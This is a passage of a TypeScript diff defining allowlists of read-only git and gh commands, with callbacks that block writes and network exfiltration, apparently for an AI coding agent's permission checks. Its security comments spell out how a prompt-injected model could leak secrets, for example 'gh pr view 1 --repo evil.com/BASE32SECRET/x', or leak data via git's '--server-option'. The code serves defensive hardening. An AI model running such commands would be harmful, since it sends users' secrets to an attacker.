+ // to .git/logs/** by expiring reflog entries. `git reflog delete` similarly
280
+ // writes. Only `git reflog` (bare = show) and `git reflog show` are safe.
281
+ // The positional-arg fallthrough at ~:1730 would otherwise accept `expire`
282
+ // as a non-flag arg, and `--all` is in GIT_REF_SELECTION_FLAGS → passes.
283
+ additionalCommandIsDangerousCallback: (
284
+ _rawCommand: string,
285
+ args: string[],
286
+ ) => {
287
+ // Block known write-capable subcommands: expire, delete, exists.
288
+ // Allow: `show`, ref names (HEAD, refs/*, branch names).
289
+ // The subcommand (if any) is the first positional arg. Subsequent
290
+ // positionals after `show` or after flags are ref names (safe).
291
+ const DANGEROUS_SUBCOMMANDS = new Set(['expire', 'delete', 'exists'])
292
+ for (const token of args) {
293
+ if (!token || token.startsWith('-')) continue
294
+ // First non-flag positional: check if it's a dangerous subcommand.
295
+ // If it's `show` or a ref name like `HEAD`/`refs/...`, safe.
296
+ if (DANGEROUS_SUBCOMMANDS.has(token)) {
297
+ return true // Dangerous subcommand — writes to .git/logs/**
298
+ }
299
+ // First positional is safe (show/HEAD/ref) — subsequent are ref args
300
+ return false
301
+ }
302
+ return false // No positional = bare `git reflog` = safe (shows reflog)
303
+ },
304
+ },
305
+ 'git stash list': {
306
+ safeFlags: {
307
+ ...GIT_LOG_DISPLAY_FLAGS,
308
+ ...GIT_REF_SELECTION_FLAGS,
309
+ ...GIT_COUNT_FLAGS,
310
+ },
311
+ },
312
+ 'git ls-remote': {
313
+ safeFlags: {
314
+ // Branch/tag filtering flags
315
+ '--branches': 'none',
316
+ '-b': 'none',
317
+ '--tags': 'none',
318
+ '-t': 'none',
319
+ '--heads': 'none',
320
+ '-h': 'none',
321
+ '--refs': 'none',
322
+ // Output control flags
323
+ '--quiet': 'none',
324
+ '-q': 'none',
325
+ '--exit-code': 'none',
326
+ '--get-url': 'none',
327
+ '--symref': 'none',
328
+ // Sorting flags
329
+ '--sort': 'string',
330
+ // Protocol flags
331
+ // SECURITY: --server-option and -o are INTENTIONALLY EXCLUDED. They
332
+ // transmit an arbitrary attacker-controlled string to the remote git
333
+ // server in the protocol v2 capability advertisement. This is a network
334
+ // WRITE primitive (sending data to remote) on what is supposed to be a
335
+ // read-only command. Even without command substitution (which is caught
336
+ // elsewhere), `--server-option="sensitive-data"` exfiltrates the value
337
+ // to whatever `origin` points to. The read-only path should never enable
338
+ // network writes.
339
+ },
340
+ },
341
+ 'git status': {
342
+ safeFlags: {
343
+ // Output format flags
344
+ '--short': 'none',
345
+ '-s': 'none',
346
+ '--branch': 'none',
347
+ '-b': 'none',
348
+ '--porcelain': 'none',
349
+ '--long': 'none',
350
+ '--verbose': 'none',
351
+ '-v': 'none',
352
+ // Untracked files handling
353
+ '--untracked-files': 'string',
354
+ '-u': 'string',
355
+ // Ignore options
356
+ '--ignored': 'none',
357
+ '--ignore-submodules': 'string',
358
+ // Column display
359
+ '--column': 'none',
360
+ '--no-column': 'none',
361
+ // Ahead/behind info
362
+ '--ahead-behind': 'none',
363
+ '--no-ahead-behind': 'none',
364
+ // Rename detection
365
+ '--renames': 'none',
366
+ '--no-renames': 'none',
367
+ '--find-renames': 'string',
368
+ '-M': 'string',
369
+ },
370
+ },
371
+ 'git blame': {
372
+ safeFlags: {
373
+ ...GIT_COLOR_FLAGS,
374
+ // Line range
375
+ '-L': 'string',
376
+ // Output format
377
+ '--porcelain': 'none',
378
+ '-p': 'none',
379
+ '--line-porcelain': 'none',
380
+ '--incremental': 'none',
381
+ '--root': 'none',
382
+ '--show-stats': 'none',
383
+ '--show-name': 'none',
384
+ '--show-number': 'none',
385
+ '-n': 'none',
386
+ '--show-email': 'none',
387
+ '-e': 'none',
388
+ '-f': 'none',
389
+ // Date formatting
390
+ '--date': 'string',
391
+ // Ignore whitespace
392
+ '-w': 'none',
393
+ // Ignore revisions
394
+ '--ignore-rev': 'string',
395
+ '--ignore-revs-file': 'string',
396
+ // Move/copy detection
397
+ '-M': 'none',
398
+ '-C': 'none',
399
+ '--score-debug': 'none',
400
+ // Abbreviation
401
+ '--abbrev': 'number',
402
+ // Other options
403
+ '-s': 'none',
404
+ '-l': 'none',
405
+ '-t': 'none',
406
+ },
407
+ },
408
+ 'git ls-files': {
409
+ safeFlags: {
410
+ // File selection
411
+ '--cached': 'none',
412
+ '-c': 'none',
413
+ '--deleted': 'none',
414
+ '-d': 'none',
415
+ '--modified': 'none',
416
+ '-m': 'none',
417
+ '--others': 'none',
418
+ '-o': 'none',
419
+ '--ignored': 'none',
420
+ '-i': 'none',
421
+ '--stage': 'none',
422
+ '-s': 'none',
423
+ '--killed': 'none',
424
+ '-k': 'none',
425
+ '--unmerged': 'none',
426
+ '-u': 'none',
427
+ // Output format
428
+ '--directory': 'none',
429
+ '--no-empty-directory': 'none',
430
+ '--eol': 'none',
431
+ '--full-name': 'none',
432
+ '--abbrev': 'number',
433
+ '--debug': 'none',
434
+ '-z': 'none',
435
+ '-t': 'none',
436
+ '-v': 'none',
437
+ '-f': 'none',
438
+ // Exclude patterns
439
+ '--exclude': 'string',
440
+ '-x': 'string',
441
+ '--exclude-from': 'string',
442
+ '-X': 'string',
443
+ '--exclude-per-directory': 'string',
444
+ '--exclude-standard': 'none',
445
+ // Error handling
446
+ '--error-unmatch': 'none',
447
+ // Recursion
448
+ '--recurse-submodules': 'none',
449
+ },
450
+ },
451
+ 'git config --get': {
452
+ safeFlags: {
453
+ // No additional flags needed - just reading config values
454
+ '--local': 'none',
455
+ '--global': 'none',
456
+ '--system': 'none',
457
+ '--worktree': 'none',
458
+ '--default': 'string',
459
+ '--type': 'string',
460
+ '--bool': 'none',
461
+ '--int': 'none',
462
+ '--bool-or-int': 'none',
463
+ '--path': 'none',
464
+ '--expiry-date': 'none',
465
+ '-z': 'none',
466
+ '--null': 'none',
467
+ '--name-only': 'none',
468
+ '--show-origin': 'none',
469
+ '--show-scope': 'none',
470
+ },
471
+ },
472
+ // NOTE: 'git remote show' must come BEFORE 'git remote' so longer patterns are matched first
473
+ 'git remote show': {
474
+ safeFlags: {
475
+ '-n': 'none',
476
+ },
477
+ // Only allow optional -n, then one alphanumeric remote name
478
+ additionalCommandIsDangerousCallback: (
479
+ _rawCommand: string,
480
+ args: string[],
481
+ ) => {
482
+ // Filter out the known safe flag
483
+ const positional = args.filter(a => a !== '-n')
484
+ // Must have exactly one positional arg that looks like a remote name
485
+ if (positional.length !== 1) return true
486
+ return !/^[a-zA-Z0-9_-]+$/.test(positional[0]!)
487
+ },
488
+ },
489
+ 'git remote': {
490
+ safeFlags: {
491
+ '-v': 'none',
492
+ '--verbose': 'none',
493
+ },
494
+ // Only allow bare 'git remote' or 'git remote -v/--verbose'
495
+ additionalCommandIsDangerousCallback: (
496
+ _rawCommand: string,
497
+ args: string[],
498
+ ) => {
499
+ // All args must be known safe flags; no positional args allowed
500
+ return args.some(a => a !== '-v' && a !== '--verbose')
501
+ },
502
+ },
503
+ // git merge-base is a read-only command for finding common ancestors
504
+ 'git merge-base': {
505
+ safeFlags: {
506
+ '--is-ancestor': 'none', // Check if first commit is ancestor of second
507
+ '--fork-point': 'none', // Find fork point
508
+ '--octopus': 'none', // Find best common ancestors for multiple refs
509
+ '--independent': 'none', // Filter independent refs
510
+ '--all': 'none', // Output all merge bases
511
+ },
512
+ },
513
+ // git rev-parse is a pure read command — resolves refs to SHAs, queries repo paths
514
+ 'git rev-parse': {
515
+ safeFlags: {
516
+ // SHA resolution and verification
517
+ '--verify': 'none', // Verify that exactly one argument is a valid object name
518
+ '--short': 'string', // Abbreviate output (optional length via =N)
519
+ '--abbrev-ref': 'none', // Symbolic name of ref
520
+ '--symbolic': 'none', // Output symbolic names
521
+ '--symbolic-full-name': 'none', // Full symbolic name including refs/heads/ prefix
522
+ // Repository path queries (all read-only)
523
+ '--show-toplevel': 'none', // Absolute path of top-level directory
524
+ '--show-cdup': 'none', // Path components to traverse up to top-level
525
+ '--show-prefix': 'none', // Relative path from top-level to cwd
526
+ '--git-dir': 'none', // Path to .git directory
527
+ '--git-common-dir': 'none', // Path to common directory (.git in main worktree)
528
+ '--absolute-git-dir': 'none', // Absolute path to .git directory
529
+ '--show-superproject-working-tree': 'none', // Superproject root (if submodule)
530
+ // Boolean queries
531
+ '--is-inside-work-tree': 'none',
532
+ '--is-inside-git-dir': 'none',
533
+ '--is-bare-repository': 'none',
534
+ '--is-shallow-repository': 'none',
535
+ '--is-shallow-update': 'none',
536
+ '--path-prefix': 'none',
537
+ },
538
+ },
539
+ // git rev-list is read-only commit enumeration — lists/counts commits reachable from refs
540
+ 'git rev-list': {
541
+ safeFlags: {
542
+ ...GIT_REF_SELECTION_FLAGS,
543
+ ...GIT_DATE_FILTER_FLAGS,
544
+ ...GIT_COUNT_FLAGS,
545
+ ...GIT_AUTHOR_FILTER_FLAGS,
546
+ // Counting
547
+ '--count': 'none', // Output commit count instead of listing
548
+ // Traversal control
549
+ '--reverse': 'none',
550
+ '--first-parent': 'none',
551
+ '--ancestry-path': 'none',
552
+ '--merges': 'none',
553
+ '--no-merges': 'none',
554
+ '--min-parents': 'number',
555
+ '--max-parents': 'number',
556
+ '--no-min-parents': 'none',
557
+ '--no-max-parents': 'none',
558
+ '--skip': 'number',
559
+ '--max-age': 'number',
560
+ '--min-age': 'number',
561
+ '--walk-reflogs': 'none',
562
+ // Output formatting
563
+ '--oneline': 'none',
564
+ '--abbrev-commit': 'none',
565
+ '--pretty': 'string',
566
+ '--format': 'string',
567
+ '--abbrev': 'number',
568
+ '--full-history': 'none',
569
+ '--dense': 'none',
570
+ '--sparse': 'none',
571
+ '--source': 'none',
572
+ '--graph': 'none',
573
+ },
574
+ },
575
+ // git describe is read-only — describes commits relative to the most recent tag
576
+ 'git describe': {
577
+ safeFlags: {
578
+ // Tag selection
579
+ '--tags': 'none', // Consider all tags, not just annotated
580
+ '--match': 'string', // Only consider tags matching the glob pattern
581
+ '--exclude': 'string', // Do not consider tags matching the glob pattern
582
+ // Output control
583
+ '--long': 'none', // Always output long format (tag-distance-ghash)
584
+ '--abbrev': 'number', // Abbreviate objectname to N hex digits
585
+ '--always': 'none', // Show uniquely abbreviated object as fallback
586
+ '--contains': 'none', // Find tag that comes after the commit
587
+ '--first-match': 'none', // Prefer tags closest to the tip (stops after first match)
588
+ '--exact-match': 'none', // Only output if an exact match (tag points at commit)
589
+ '--candidates': 'number', // Limit walk before selecting best candidates
590
+ // Suffix/dirty markers
591
+ '--dirty': 'none', // Append "-dirty" if working tree has modifications
592
+ '--broken': 'none', // Append "-broken" if repository is in invalid state
593
+ },
594
+ },
595
+ // git cat-file is read-only object inspection — displays type, size, or content of objects
596
+ // NOTE: --batch (without --check) is intentionally excluded — it reads arbitrary objects
597
+ // from stdin which could be exploited in piped commands to dump sensitive objects.
598
+ 'git cat-file': {
599
+ safeFlags: {
600
+ // Object query modes (all purely read-only)
601
+ '-t': 'none', // Print type of object
602
+ '-s': 'none', // Print size of object
603
+ '-p': 'none', // Pretty-print object contents
604
+ '-e': 'none', // Exit with zero if object exists, non-zero otherwise
605
+ // Batch mode — read-only check variant only
606
+ '--batch-check': 'none', // For each object on stdin, print type and size (no content)
607
+ // Output control
608
+ '--allow-undetermined-type': 'none',
609
+ },
610
+ },
611
+ // git for-each-ref is read-only ref iteration — lists refs with optional formatting and filtering
612
+ 'git for-each-ref': {
613
+ safeFlags: {
614
+ // Output formatting
615
+ '--format': 'string', // Format string using %(fieldname) placeholders
616
+ // Sorting
617
+ '--sort': 'string', // Sort by key (e.g., refname, creatordate, version:refname)
618
+ // Limiting
619
+ '--count': 'number', // Limit output to at most N refs
620
+ // Filtering
621
+ '--contains': 'string', // Only list refs that contain specified commit
622
+ '--no-contains': 'string', // Only list refs that do NOT contain specified commit
623
+ '--merged': 'string', // Only list refs reachable from specified commit
624
+ '--no-merged': 'string', // Only list refs NOT reachable from specified commit
625
+ '--points-at': 'string', // Only list refs pointing at specified object
626
+ },
627
+ },
628
+ // git grep is read-only — searches tracked files for patterns
629
+ 'git grep': {
630
+ safeFlags: {
631
+ // Pattern matching modes
632
+ '-e': 'string', // Pattern
633
+ '-E': 'none', // Extended regexp
634
+ '--extended-regexp': 'none',
635
+ '-G': 'none', // Basic regexp (default)
636
+ '--basic-regexp': 'none',
637
+ '-F': 'none', // Fixed strings
638
+ '--fixed-strings': 'none',
639
+ '-P': 'none', // Perl regexp
640
+ '--perl-regexp': 'none',
641
+ // Match control
642
+ '-i': 'none', // Ignore case
643
+ '--ignore-case': 'none',
644
+ '-v': 'none', // Invert match
645
+ '--invert-match': 'none',
646
+ '-w': 'none', // Word regexp
647
+ '--word-regexp': 'none',
648
+ // Output control
649
+ '-n': 'none', // Line number
650
+ '--line-number': 'none',
651
+ '-c': 'none', // Count
652
+ '--count': 'none',
653
+ '-l': 'none', // Files with matches
654
+ '--files-with-matches': 'none',
655
+ '-L': 'none', // Files without match
656
+ '--files-without-match': 'none',
657
+ '-h': 'none', // No filename
658
+ '-H': 'none', // With filename
659
+ '--heading': 'none',
660
+ '--break': 'none',
661
+ '--full-name': 'none',
662
+ '--color': 'none',
663
+ '--no-color': 'none',
664
+ '-o': 'none', // Only matching
665
+ '--only-matching': 'none',
666
+ // Context
667
+ '-A': 'number', // After context
668
+ '--after-context': 'number',
669
+ '-B': 'number', // Before context
670
+ '--before-context': 'number',
671
+ '-C': 'number', // Context
672
+ '--context': 'number',
673
+ // Boolean operators for multi-pattern
674
+ '--and': 'none',
675
+ '--or': 'none',
676
+ '--not': 'none',
677
+ // Scope control
678
+ '--max-depth': 'number',
679
+ '--untracked': 'none',
680
+ '--no-index': 'none',
681
+ '--recurse-submodules': 'none',
682
+ '--cached': 'none',
683
+ // Threads
684
+ '--threads': 'number',
685
+ // Quiet
686
+ '-q': 'none',
687
+ '--quiet': 'none',
688
+ },
689
+ },
690
+ // git stash show is read-only — displays diff of a stash entry
691
+ 'git stash show': {
692
+ safeFlags: {
693
+ ...GIT_STAT_FLAGS,
694
+ ...GIT_COLOR_FLAGS,
695
+ ...GIT_PATCH_FLAGS,
696
+ // Diff options
697
+ '--word-diff': 'none',
698
+ '--word-diff-regex': 'string',
699
+ '--diff-filter': 'string',
700
+ '--abbrev': 'number',
701
+ },
702
+ },
703
+ // git worktree list is read-only — lists linked working trees
704
+ 'git worktree list': {
705
+ safeFlags: {
706
+ '--porcelain': 'none',
707
+ '-v': 'none',
708
+ '--verbose': 'none',
709
+ '--expire': 'string',
710
+ },
711
+ },
712
+ 'git tag': {
713
+ safeFlags: {
714
+ // List mode flags
715
+ '-l': 'none',
716
+ '--list': 'none',
717
+ '-n': 'number',
718
+ '--contains': 'string',
719
+ '--no-contains': 'string',
720
+ '--merged': 'string',
721
+ '--no-merged': 'string',
722
+ '--sort': 'string',
723
+ '--format': 'string',
724
+ '--points-at': 'string',
725
+ '--column': 'none',
726
+ '--no-column': 'none',
727
+ '-i': 'none',
728
+ '--ignore-case': 'none',
729
+ },
730
+ // SECURITY: Block tag creation via positional arguments. `git tag foo`
731
+ // creates .git/refs/tags/foo (41-byte file write) — NOT read-only.
732
+ // This is identical semantics to `git branch foo` (which has the same
733
+ // callback below). Without this callback, validateFlags's default
734
+ // positional-arg fallthrough at ~:1730 accepts `mytag` as a non-flag arg,
735
+ // and git tag auto-approves. While the write is constrained (path limited
736
+ // to .git/refs/tags/, content is fixed HEAD SHA), it violates the
737
+ // read-only invariant and can pollute CI/CD tag-pattern matching or make
738
+ // abandoned commits reachable via `git tag foo <commit>`.
739
+ additionalCommandIsDangerousCallback: (
740
+ _rawCommand: string,
741
+ args: string[],
742
+ ) => {
743
+ // Safe uses: `git tag` (list), `git tag -l pattern` (list filtered),
744
+ // `git tag --contains <ref>` (list containing). A bare positional arg
745
+ // without -l/--list is a tag name to CREATE — dangerous.
746
+ const flagsWithArgs = new Set([
747
+ '--contains',
748
+ '--no-contains',
749
+ '--merged',
750
+ '--no-merged',
751
+ '--points-at',
752
+ '--sort',
753
+ '--format',
754
+ '-n',
755
+ ])
756
+ let i = 0
757
+ let seenListFlag = false
758
+ let seenDashDash = false
759
+ while (i < args.length) {
760
+ const token = args[i]
761
+ if (!token) {
762
+ i++
763
+ continue
764
+ }
765
+ // `--` ends flag parsing. All subsequent tokens are positional args,
766
+ // even if they start with `-`. `git tag -- -l` CREATES a tag named `-l`.
767
+ if (token === '--' && !seenDashDash) {
768
+ seenDashDash = true
769
+ i++
770
+ continue
771
+ }
772
+ if (!seenDashDash && token.startsWith('-')) {
773
+ // Check for -l/--list (exact or in a bundle). `-li` bundles -l and
774
+ // -i — both 'none' type. Array.includes('-l') exact-matches, missing
775
+ // bundles like `-li`, `-il`. Check individual chars for short bundles.
776
+ if (token === '--list' || token === '-l') {
777
+ seenListFlag = true
778
+ } else if (
779
+ token[0] === '-' &&
780
+ token[1] !== '-' &&
781
+ token.length > 2 &&
782
+ !token.includes('=') &&
783
+ token.slice(1).includes('l')
784
+ ) {
785
+ // Short-flag bundle like -li, -il containing 'l'
786
+ seenListFlag = true
787
+ }
788
+ if (token.includes('=')) {
789
+ i++
790
+ } else if (flagsWithArgs.has(token)) {
791
+ i += 2
792
+ } else {
793
+ i++
794
+ }
795
+ } else {
796
+ // Non-flag positional arg (or post-`--` positional). Safe only if
797
+ // preceded by -l/--list (then it's a pattern, not a tag name).
798
+ if (!seenListFlag) {
799
+ return true // Positional arg without --list = tag creation
800
+ }
801
+ i++
802
+ }
803
+ }
804
+ return false
805
+ },
806
+ },
807
+ 'git branch': {
808
+ safeFlags: {
809
+ // List mode flags
810
+ '-l': 'none',
811
+ '--list': 'none',
812
+ '-a': 'none',
813
+ '--all': 'none',
814
+ '-r': 'none',
815
+ '--remotes': 'none',
816
+ '-v': 'none',
817
+ '-vv': 'none',
818
+ '--verbose': 'none',
819
+ // Display options
820
+ '--color': 'none',
821
+ '--no-color': 'none',
822
+ '--column': 'none',
823
+ '--no-column': 'none',
824
+ // SECURITY: --abbrev stays 'number' so validateFlags accepts --abbrev=N
825
+ // (attached form, safe). The DETACHED form `--abbrev N` is the bug:
826
+ // git uses PARSE_OPT_OPTARG (optional-attached only) — detached N becomes
827
+ // a POSITIONAL branch name, creating .git/refs/heads/N. validateFlags
828
+ // with 'number' consumes N, but the CALLBACK below catches it: --abbrev
829
+ // is NOT in callback's flagsWithArgs (removed), so callback sees N as a
830
+ // positional without list flag → dangerous. Two-layer defense: validate-
831
+ // Flags accepts both forms, callback blocks detached.
832
+ '--abbrev': 'number',
833
+ '--no-abbrev': 'none',
834
+ // Filtering - these take commit/ref arguments
835
+ '--contains': 'string',
836
+ '--no-contains': 'string',
837
+ '--merged': 'none', // Optional commit argument - handled in callback
838
+ '--no-merged': 'none', // Optional commit argument - handled in callback
839
+ '--points-at': 'string',
840
+ // Sorting
841
+ '--sort': 'string',
842
+ // Note: --format is intentionally excluded as it could pose security risks
843
+ // Show current
844
+ '--show-current': 'none',
845
+ '-i': 'none',
846
+ '--ignore-case': 'none',
847
+ },
848
+ // Block branch creation via positional arguments (e.g., "git branch newbranch")
849
+ // Flag validation is handled by safeFlags above
850
+ // args is tokens after "git branch"
851
+ additionalCommandIsDangerousCallback: (
852
+ _rawCommand: string,
853
+ args: string[],
854
+ ) => {
855
+ // Block branch creation: "git branch <name>" or "git branch <name> <start-point>"
856
+ // Only safe uses are: "git branch" (list), "git branch -flags" (list with options),
857
+ // or "git branch --contains/--merged/etc <ref>" (filtering)
858
+ // Flags that require an argument
859
+ const flagsWithArgs = new Set([
860
+ '--contains',
861
+ '--no-contains',
862
+ '--points-at',
863
+ '--sort',
864
+ // --abbrev REMOVED: git does NOT consume detached arg (PARSE_OPT_OPTARG)
865
+ ])
866
+ // Flags with optional arguments (don't require, but can take one)
867
+ const flagsWithOptionalArgs = new Set(['--merged', '--no-merged'])
868
+ let i = 0
869
+ let lastFlag = ''
870
+ let seenListFlag = false
871
+ let seenDashDash = false
872
+ while (i < args.length) {
873
+ const token = args[i]
874
+ if (!token) {
875
+ i++
876
+ continue
877
+ }
878
+ // `--` ends flag parsing. `git branch -- -l` CREATES a branch named `-l`.
879
+ if (token === '--' && !seenDashDash) {
880
+ seenDashDash = true
881
+ lastFlag = ''
882
+ i++
883
+ continue
884
+ }
885
+ if (!seenDashDash && token.startsWith('-')) {
886
+ // Check for -l/--list including short-flag bundles (-li, -la, etc.)
887
+ if (token === '--list' || token === '-l') {
888
+ seenListFlag = true
889
+ } else if (
890
+ token[0] === '-' &&
891
+ token[1] !== '-' &&
892
+ token.length > 2 &&
893
+ !token.includes('=') &&
894
+ token.slice(1).includes('l')
895
+ ) {
896
+ seenListFlag = true
897
+ }
898
+ if (token.includes('=')) {
899
+ lastFlag = token.split('=')[0] || ''
900
+ i++
901
+ } else if (flagsWithArgs.has(token)) {
902
+ lastFlag = token
903
+ i += 2
904
+ } else {
905
+ lastFlag = token
906
+ i++
907
+ }
908
+ } else {
909
+ // Non-flag argument (or post-`--` positional) - could be:
910
+ // 1. A branch name (dangerous - creates a branch)
911
+ // 2. A pattern after --list/-l (safe)
912
+ // 3. An optional argument after --merged/--no-merged (safe)
913
+ const lastFlagHasOptionalArg = flagsWithOptionalArgs.has(lastFlag)
914
+ if (!seenListFlag && !lastFlagHasOptionalArg) {
915
+ return true // Positional arg without --list or filtering flag = branch creation
916
+ }
917
+ i++
918
+ }
919
+ }
920
+ return false
921
+ },
922
+ },
923
+ }
924
+
925
+ // ---------------------------------------------------------------------------
926
+ // GH_READ_ONLY_COMMANDS — ant-only gh CLI commands (network-dependent)
927
+ // ---------------------------------------------------------------------------
928
+
929
+ // SECURITY: Shared callback for all gh commands to prevent network exfil.
930
+ // gh's repo argument accepts `[HOST/]OWNER/REPO` — when HOST is present
931
+ // (3 segments), gh connects to that host's API. A prompt-injected model can
932
+ // encode secrets as the OWNER segment and exfiltrate via DNS/HTTP:
933
+ // gh pr view 1 --repo evil.com/BASE32SECRET/x
934
+ // → GET https://evil.com/api/v3/repos/BASE32SECRET/x/pulls/1
935
+ // gh also accepts positional URLs: `gh pr view https://evil.com/owner/repo/pull/1`
936
+ //
937
+ // git ls-remote has an inline URL guard (readOnlyValidation.ts:~944); this
938
+ // callback provides the equivalent for gh. Rejects:
939
+ // - Any token with 2+ slashes (HOST/OWNER/REPO format — normal is OWNER/REPO)
940
+ // - Any token with `://` (URL)
941
+ // - Any token with `@` (SSH-style)
942
+ // This covers BOTH --repo values AND positional URL/repo arguments, INCLUDING
943
+ // the equals-attached form `--repo=HOST/OWNER/REPO` (cobra accepts both forms).
944
+ function ghIsDangerousCallback(_rawCommand: string, args: string[]): boolean {
945
+ for (const token of args) {
946
+ if (!token) continue
947
+ // For flag tokens, extract the VALUE after `=` for inspection. Without this,
948
+ // `--repo=evil.com/SECRET/x` (single token starting with `-`) gets skipped
949
+ // entirely, bypassing the HOST check. Cobra treats `--flag=val` identically
950
+ // to `--flag val`; we must inspect both forms.
951
+ let value = token
952
+ if (token.startsWith('-')) {
953
+ const eqIdx = token.indexOf('=')
954
+ if (eqIdx === -1) continue // flag without inline value, nothing to inspect
955
+ value = token.slice(eqIdx + 1)
956
+ if (!value) continue
957
+ }
958
+ // Skip values that are clearly not repo specs (no `/` at all, or pure numbers)
959
+ if (
960
+ !value.includes('/') &&
961
+ !value.includes('://') &&
962
+ !value.includes('@')
963
+ ) {
964
+ continue
965
+ }
966
+ // URL schemes: https://, http://, git://, ssh://
967
+ if (value.includes('://')) {
968
+ return true
969
+ }
970
+ // SSH-style: git@host:owner/repo
971
+ if (value.includes('@')) {
972
+ return true
973
+ }
974
+ // 3+ segments = HOST/OWNER/REPO (normal gh format is OWNER/REPO, 1 slash)
975
+ // Count slashes: 2+ slashes means 3+ segments
976
+ const slashCount = (value.match(/\//g) || []).length
977
+ if (slashCount >= 2) {
978
+ return true
979
+ }
980
+ }
981
+ return false
982
+ }
983
+
984
+ export const GH_READ_ONLY_COMMANDS: Record<string, ExternalCommandConfig> = {
985
+ // gh pr view is read-only — displays pull request details
986
+ 'gh pr view': {
987
+ safeFlags: {
988
+ '--json': 'string', // JSON field selection
989
+ '--comments': 'none', // Show comments
990
+ '--repo': 'string', // Target repository (OWNER/REPO)
991
+ '-R': 'string',
992
+ },
993
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
994
+ },
995
+ // gh pr list is read-only — lists pull requests
996
+ 'gh pr list': {
997
+ safeFlags: {
998
+ '--state': 'string', // open, closed, merged, all
999
+ '-s': 'string',
1000
+ '--author': 'string',
1001
+ '--assignee': 'string',
1002
+ '--label': 'string',
1003
+ '--limit': 'number',
1004
+ '-L': 'number',
1005
+ '--base': 'string',
1006
+ '--head': 'string',
1007
+ '--search': 'string',
1008
+ '--json': 'string',
1009
+ '--draft': 'none',
1010
+ '--app': 'string',
1011
+ '--repo': 'string',
1012
+ '-R': 'string',
1013
+ },
1014
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1015
+ },
1016
+ // gh pr diff is read-only — shows pull request diff
1017
+ 'gh pr diff': {
1018
+ safeFlags: {
1019
+ '--color': 'string',
1020
+ '--name-only': 'none',
1021
+ '--patch': 'none',
1022
+ '--repo': 'string',
1023
+ '-R': 'string',
1024
+ },
1025
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1026
+ },
1027
+ // gh pr checks is read-only — shows CI status checks
1028
+ 'gh pr checks': {
1029
+ safeFlags: {
1030
+ '--watch': 'none',
1031
+ '--required': 'none',
1032
+ '--fail-fast': 'none',
1033
+ '--json': 'string',
1034
+ '--interval': 'number',
1035
+ '--repo': 'string',
1036
+ '-R': 'string',
1037
+ },
1038
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1039
+ },
1040
+ // gh issue view is read-only — displays issue details
1041
+ 'gh issue view': {
1042
+ safeFlags: {
1043
+ '--json': 'string',
1044
+ '--comments': 'none',
1045
+ '--repo': 'string',
1046
+ '-R': 'string',
1047
+ },
1048
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1049
+ },
1050
+ // gh issue list is read-only — lists issues
1051
+ 'gh issue list': {
1052
+ safeFlags: {
1053
+ '--state': 'string',
1054
+ '-s': 'string',
1055
+ '--assignee': 'string',
1056
+ '--author': 'string',
1057
+ '--label': 'string',
1058
+ '--limit': 'number',
1059
+ '-L': 'number',
1060
+ '--milestone': 'string',
1061
+ '--search': 'string',
1062
+ '--json': 'string',
1063
+ '--app': 'string',
1064
+ '--repo': 'string',
1065
+ '-R': 'string',
1066
+ },
1067
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1068
+ },
1069
+ // gh repo view is read-only — displays repository details
1070
+ // NOTE: gh repo view uses a positional argument, not --repo/-R flags
1071
+ 'gh repo view': {
1072
+ safeFlags: {
1073
+ '--json': 'string',
1074
+ },
1075
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1076
+ },
1077
+ // gh run list is read-only — lists workflow runs
1078
+ 'gh run list': {
1079
+ safeFlags: {
1080
+ '--branch': 'string', // Filter by branch
1081
+ '-b': 'string',
1082
+ '--status': 'string', // Filter by status
1083
+ '-s': 'string',
1084
+ '--workflow': 'string', // Filter by workflow
1085
+ '-w': 'string', // NOTE: -w is --workflow here, NOT --web (gh run list has no --web)
1086
+ '--limit': 'number', // Max results
1087
+ '-L': 'number',
1088
+ '--json': 'string', // JSON field selection
1089
+ '--repo': 'string', // Target repository
1090
+ '-R': 'string',
1091
+ '--event': 'string', // Filter by event type
1092
+ '-e': 'string',
1093
+ '--user': 'string', // Filter by user
1094
+ '-u': 'string',
1095
+ '--created': 'string', // Filter by creation date
1096
+ '--commit': 'string', // Filter by commit SHA
1097
+ '-c': 'string',
1098
+ },
1099
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1100
+ },
1101
+ // gh run view is read-only — displays a workflow run's details
1102
+ 'gh run view': {
1103
+ safeFlags: {
1104
+ '--log': 'none', // Show full run log
1105
+ '--log-failed': 'none', // Show log for failed steps only
1106
+ '--exit-status': 'none', // Exit with run's status code
1107
+ '--verbose': 'none', // Show job steps
1108
+ '-v': 'none', // NOTE: -v is --verbose here, NOT --web
1109
+ '--json': 'string', // JSON field selection
1110
+ '--repo': 'string', // Target repository
1111
+ '-R': 'string',
1112
+ '--job': 'string', // View a specific job by ID
1113
+ '-j': 'string',
1114
+ '--attempt': 'number', // View a specific attempt
1115
+ '-a': 'number',
1116
+ },
1117
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1118
+ },
1119
+ // gh auth status is read-only — displays authentication state
1120
+ // NOTE: --show-token/-t intentionally excluded (leaks secrets)
1121
+ 'gh auth status': {
1122
+ safeFlags: {
1123
+ '--active': 'none', // Display active account only
1124
+ '-a': 'none',
1125
+ '--hostname': 'string', // Check specific hostname
1126
+ '-h': 'string',
1127
+ '--json': 'string', // JSON field selection
1128
+ },
1129
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1130
+ },
1131
+ // gh pr status is read-only — shows your PRs
1132
+ 'gh pr status': {
1133
+ safeFlags: {
1134
+ '--conflict-status': 'none', // Display merge conflict status
1135
+ '-c': 'none',
1136
+ '--json': 'string', // JSON field selection
1137
+ '--repo': 'string', // Target repository
1138
+ '-R': 'string',
1139
+ },
1140
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1141
+ },
1142
+ // gh issue status is read-only — shows your issues
1143
+ 'gh issue status': {
1144
+ safeFlags: {
1145
+ '--json': 'string', // JSON field selection
1146
+ '--repo': 'string', // Target repository
1147
+ '-R': 'string',
1148
+ },
1149
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1150
+ },
1151
+ // gh release list is read-only — lists releases
1152
+ 'gh release list': {
1153
+ safeFlags: {
1154
